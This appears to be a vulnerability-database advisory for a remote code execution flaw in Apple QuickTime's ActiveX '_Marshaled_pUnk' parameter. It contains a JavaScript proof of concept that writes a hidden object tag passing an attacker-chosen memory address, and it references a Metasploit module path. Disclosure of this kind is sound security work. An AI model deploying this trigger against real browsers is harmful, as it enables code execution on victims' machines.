Apple QuickTime '_Marshaled_pUnk' Remote Code Execution Vulnerability

Apple QuickTime '_Marshaled_pUnk' Remote Code Execution Vulnerability

The following proof of concept is available:

addr = 354552864; // 0x15220C20 [pUnk]
var obj= '<' + 'object
classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0"
height="0"'+'>'
+'<' + 'PARAM name="_Marshaled_pUnk" value="'+addr+'"' + '/>'
+'<'+'/'+'object>';

The following Metasploit exploit module is available:

/data/vulnerabilities/exploits/42841.rb